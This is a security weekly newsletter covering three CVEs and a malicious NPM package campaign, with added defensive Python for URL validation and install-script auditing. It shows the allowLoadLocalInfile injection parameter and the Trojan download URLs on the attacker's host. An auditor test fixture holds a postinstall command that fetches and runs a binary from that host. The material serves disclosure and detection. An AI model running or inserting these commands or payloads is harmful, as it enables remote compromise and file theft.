OSCS Open Source Security Weekly Issue 56: Apache Airflow Spark Provider Arbitrary File Read Vulnerability

This week's security overview

The OSCS community catalogued 3 security vulnerabilities this week. The publicly disclosed ones worth attention are: Apache NiFi Connection URL Authentication Bypass Vulnerability (CVE-2023-40037), PowerJob Unauthorized Access Vulnerability (CVE-2023-36106), and Apache Airflow Spark Provider Arbitrary File Read Vulnerability (CVE-2023-40272).

A total of 81 different versions of malicious components were detected in the NPM and PyPI repositories. Among them, NPM packages such as mall-front-babel-directive carried remote-control Trojans, and this series of packages showed persistent threat behavior.

List of Critical Security Vulnerabilities

1. Apache NiFi Connection URL Authentication Bypass Vulnerability (CVE-2023-40037)

Apache NiFi is an open source data stream processing and automation tool.

In affected versions, several Processors and Controller Services filter connection URL parameters incompletely when configuring JDBC and JNDI JMS connections: user-supplied URLs are checked with the startsWith method, so the filter can be bypassed. An attacker who constructs a URL in a specific format can bypass connection URL validation, which may lead to data leakage and other harm.

Reference link: https://www.oscs1024.com/hd/MPS-0378-t16x

2. PowerJob Unauthorized Access Vulnerability (CVE-2023-36106)

PowerJob is an open source distributed task scheduling framework.

Affected versions of PowerJob contain an improper access control vulnerability. The /container/list interface requires no authentication, so an unauthenticated attacker can supply an appId parameter to the /container/list interface and obtain sensitive information such as the identity, running status and logs of the application's containers.

Reference link: https://www.oscs1024.com/hd/MPS-st3c-aw5x
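The access-control pattern behind the /container/list issue, as an added example (this is not PowerJob's code). When authentication is switched on route by route, any route nobody registered stays open; the dispatcher below denies by default and the handler additionally checks that the caller is allowed to see the requested appId. The session store, the header name, the routes other than /container/list and the container data are constructed for illustration.

```python
"""
Added example (not PowerJob's code): deny-by-default authentication in front
of every route, plus object-level authorization on the appId parameter, shown
beside the unchecked handler pattern the advisory describes.
"""
from dataclasses import dataclass, field

# Constructed session store: token -> set of appIds that session may manage.
SESSIONS = {"tok-team-a": {101}, "tok-admin": {101, 202}}
# Constructed allowlist of routes reachable without a session.
PUBLIC_PATHS = {"/login", "/health"}
# Constructed container inventory keyed by appId.
CONTAINERS = {
    101: [{"containerId": 1, "status": "RUNNING"}],
    202: [{"containerId": 7, "status": "STOPPED"}],
}


@dataclass
class Request:
    path: str
    params: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)


def container_list_unchecked(request: Request):
    """Vulnerable pattern: nothing authenticates the caller and the handler
    serves whatever appId it is given, so an anonymous request with an
    arbitrary appId returns that application's container details."""
    app_id = int(request.params.get("appId", 0))
    return 200, CONTAINERS.get(app_id, [])


def container_list_checked(request: Request, token: str):
    """Hardened handler: the authenticated session must own the appId."""
    try:
        app_id = int(request.params.get("appId", ""))
    except ValueError:
        return 400, None
    if app_id not in SESSIONS[token]:
        return 403, None
    return 200, CONTAINERS.get(app_id, [])


def handle(request: Request):
    """Deny-by-default dispatcher: every path outside PUBLIC_PATHS needs a
    valid session before any handler runs; handlers then authorize."""
    token = request.headers.get("Authorization")  # constructed header name
    if request.path not in PUBLIC_PATHS and token not in SESSIONS:
        return 401, None
    if request.path == "/container/list":
        return container_list_checked(request, token)
    if request.path == "/health":
        return 200, {"status": "ok"}
    return 404, None


if __name__ == "__main__":
    anon = Request("/container/list", {"appId": "202"})
    print("unchecked handler, anonymous:", container_list_unchecked(anon))
    print("deny-by-default, anonymous:  ", handle(anon))
    print("team-a asks for 202:         ",
          handle(Request("/container/list", {"appId": "202"},
                         {"Authorization": "tok-team-a"})))
```

The point of the dispatcher is that forgetting to register a route fails closed (401) instead of open; the per-appId check covers the second half of the advisory, where the appId value itself selects whose data is returned.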

3. Apache Airflow Spark Provider Arbitrary File Read Vulnerability (CVE-2023-40272)

The Apache Airflow Spark Provider is a provider plugin for Apache Airflow that manages and schedules Apache Spark jobs from Airflow.

In affected versions, the conn_prefix parameter used when building the JDBC connection is not validated, so a "?" can be included to append arbitrary connection parameters. By constructing the parameter ?allowLoadLocalInfile=true, an attacker can point the connection at a malicious MySQL server under their control and read arbitrary files on the Airflow host.

Reference link: https://www.oscs1024.com/hd/MPS-w0kg-9vl7
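Items 1 and 3 above are two faces of the same defect: a JDBC connection URL accepted on the strength of a prefix match, or assembled from fields that are never checked for URL syntax. The following added example (not code from Apache NiFi, Apache Airflow or OSCS, and not a reproduction of how either project builds its URLs) puts a prefix-only check beside a structural one, and shows connection fields being validated before they are joined into a URL so that a conn_prefix carrying "?" is refused. The driver and property allowlists are constructed for illustration.

```python
"""
Added example (not code from Apache NiFi, Apache Airflow or OSCS):
prefix-only vs. structural validation of a JDBC connection URL, and
field-level validation before a URL is assembled from connection settings.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed allowlists; a real deployment derives them from the drivers it ships.
ALLOWED_PREFIXES = ("jdbc:mysql://", "jdbc:postgresql://")
ALLOWED_PROPERTIES = {"useSSL", "serverTimezone", "connectTimeout"}

_CONN_PREFIX_RE = re.compile(r"jdbc:[a-z][a-z0-9]*")   # e.g. jdbc:mysql
_NAME_RE = re.compile(r"[A-Za-z0-9._-]+")              # hostnames, schema names


def weak_check(url: str) -> bool:
    """Prefix-only validation (the startsWith pattern): anything beginning
    with an allowed prefix passes, including URLs carrying a query string."""
    return url.startswith(ALLOWED_PREFIXES)


def strict_check(url: str) -> bool:
    """Structural validation: the URL must parse, name a plain host, carry no
    credentials or fragment, and use only allowlisted connection properties."""
    if not url.startswith(ALLOWED_PREFIXES):
        return False
    # Drop the 'jdbc:' wrapper so urlsplit sees an ordinary scheme://host URL.
    parts = urlsplit(url[len("jdbc:"):])
    try:
        parts.port  # raises ValueError for a non-numeric or out-of-range port
    except ValueError:
        return False
    if not parts.hostname or parts.username or parts.password or parts.fragment:
        return False
    if not _NAME_RE.fullmatch(parts.hostname):
        return False
    properties = dict(parse_qsl(parts.query, keep_blank_values=True))
    # Unknown properties (allowLoadLocalInfile among them) are rejected outright;
    # an allowlist needs no knowledge of which driver options are dangerous.
    return all(name in ALLOWED_PROPERTIES for name in properties)


def validate_conn_fields(conn_prefix: str, host: str, port: int, schema: str):
    """Return None if the fields can safely be joined into a URL, else a reason.
    Each pattern excludes '?', '&', '/', '#' and whitespace, so no single field
    can smuggle a query string into the assembled URL."""
    if not _CONN_PREFIX_RE.fullmatch(conn_prefix):
        return "conn_prefix must look like jdbc:<driver>"
    if not _NAME_RE.fullmatch(host):
        return "host contains characters outside a plain hostname"
    if not 0 < int(port) < 65536:
        return "port out of range"
    if not _NAME_RE.fullmatch(schema):
        return "schema contains reserved characters"
    return None


def build_jdbc_url(conn_prefix: str, host: str, port: int, schema: str) -> str:
    """Assemble the URL only after every field passed validate_conn_fields."""
    problem = validate_conn_fields(conn_prefix, host, port, schema)
    if problem:
        raise ValueError(problem)
    return f"{conn_prefix}://{host}:{port}/{schema}"


if __name__ == "__main__":
    # Constructed inputs: a normal connection and one carrying the property
    # named in the advisory. 203.0.113.5 is a documentation-range address.
    for url in ("jdbc:mysql://db.internal:3306/airflow",
                "jdbc:mysql://203.0.113.5:3306/x?allowLoadLocalInfile=true"):
        print(f"{url}\n  weak={weak_check(url)} strict={strict_check(url)}")
    print(build_jdbc_url("jdbc:mysql", "db.internal", 3306, "airflow"))
    print(validate_conn_fields("jdbc:mysql://203.0.113.5?allowLoadLocalInfile=true",
                               "db.internal", 3306, "airflow"))
```

Both checks take the allowlist route rather than blocking named properties: a denylist would have to track every driver option that can trigger client-side file access, whereas an allowlist only has to name the handful of options the deployment actually uses.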

4. NPM component packages such as mall-front-babel-directive carry remote control Trojans

After releasing NPM packages such as essc-crypto and urs-remote on August 17, the attacker went on to publish further malicious NPM packages such as mall-front-babel-directive. When a user installs one of them, it determines whether the system is Windows, Mac or Linux, downloads the matching remote-control Trojan from the locations below, and then connects to the attacker-controlled C2 server, which can remotely execute system commands and upload or download arbitrary files.

Windows version: hxxps://img.murphysec-nb.love/w_x32.exe

Mac version: hxxps://img.murphysec-nb.love/m_arm64

Linux version: hxxps://img.murphysec-nb.love/l_x64

Reference link: https://www.oscs1024.com/hd/MPS-6olr-8p73
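A pre-install audit of npm package metadata for the behaviour described above, as an added example (not OSCS tooling). It assumes, and the advisory does not state this, that install-time download-and-execute behaviour is wired through npm lifecycle scripts (preinstall, install, postinstall, prepare); it flags scripts that combine a download tool, a URL and execution, and separately any script that reaches a host from the advisory's indicator list. All three package.json documents are constructed; only the host name comes from the advisory.

```python
"""
Added example (not OSCS tooling): heuristic audit of npm lifecycle scripts for
download-and-execute behaviour and for contact with known-malicious hosts.
"""
import json
import re
from urllib.parse import urlsplit

# Host published in the advisory above; in practice this set comes from a feed.
IOC_HOSTS = {"img.murphysec-nb.love"}

# Assumption: install-time behaviour is delivered through these npm script hooks.
LIFECYCLE_SCRIPTS = ("preinstall", "install", "postinstall", "prepare")
DOWNLOADERS = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|certutil|bitsadmin)\b", re.I)
EXECUTORS = re.compile(r"(\|\s*(sh|bash)\b|chmod\s+\+x|\bpowershell\b|node\s+-e)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)


def audit_package(package_json: str):
    """Return (script name, reason) findings for one package.json document."""
    manifest = json.loads(package_json)
    findings = []
    for name, command in manifest.get("scripts", {}).items():
        if name not in LIFECYCLE_SCRIPTS:
            continue  # test/build scripts do not run on install
        urls = URL_RE.findall(command)
        hosts = {urlsplit(u).hostname for u in urls}
        hits = sorted(hosts & IOC_HOSTS)
        if hits:
            findings.append((name, f"contacts known-malicious host {hits}"))
        # Both a fetch tool and an execution step are required; a plain binary
        # download (common for native add-ons) is not flagged on its own.
        if urls and DOWNLOADERS.search(command) and EXECUTORS.search(command):
            findings.append((name, "downloads from a URL and executes the result"))
    return findings


# Constructed manifests. The first is ordinary; the second models the advisory's
# behaviour (fetch a platform binary, make it executable, run it); the third
# downloads a file without executing it and should produce no finding.
BENIGN = json.dumps({"name": "left-pad-ish", "version": "1.0.0",
                     "scripts": {"test": "node test.js", "build": "tsc"}})
SUSPICIOUS = json.dumps({"name": "mall-front-babel-directive", "version": "1.0.0",
                         "scripts": {"postinstall": "curl -s https://img.murphysec-nb.love/l_x64"
                                                    " -o /tmp/.l && chmod +x /tmp/.l && /tmp/.l &"}})
DOWNLOAD_ONLY = json.dumps({"name": "native-addon-ish", "version": "2.0.0",
                            "scripts": {"install": "curl -o prebuilt.tgz https://example.com/prebuilt.tgz"}})


if __name__ == "__main__":
    for doc in (BENIGN, SUSPICIOUS, DOWNLOAD_ONLY):
        print(json.loads(doc)["name"], "->", audit_package(doc) or "no findings")
```

Treat a finding as a triage signal rather than a verdict: legitimate native add-ons also fetch binaries during install, which is why the heuristic requires an execution step as well, and why the indicator-host match is reported separately.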

* The vulnerability details pages support free detection of affected third-party components used in your project.

Poisoning Risk Monitoring

The number of malicious components that OSCS monitoring detected in the NPM repository is shown below.

81 different versions of malicious components were newly discovered this week:

  • 64% of the malicious components harvest sensitive host information (such as the host's username and IP address) and send it to a malicious server
  • 36% of the malicious components install Trojan backdoor files

Other Information

Midway through an attack-and-defense drill, I found the red team leader who was poisoning packages: https://mp.weixin.qq.com/s/zHgRa9Whp2mCpHVviHoOwg

OSCS publishes security risk updates covering open source component vulnerabilities, incidents and related information, and offers a free subscription service for vulnerability and poisoning intelligence. Community users can receive first-hand intelligence promptly by configuring Feishu, DingTalk and WeCom (enterprise WeChat) bots: https://www.oscs1024.com/cm

For details on how to subscribe, see: https://www.oscs1024.com/docs/vuln-warning/intro/#%E6%83%85%E6%8A%A5%E7%B1%BB%E5%9E%8B%E5%92%8C%E6%8E%A8%E9%80%81%E5%86%85%E5%AE%B9


Origin my.oschina.net/u/5851526/blog/10100518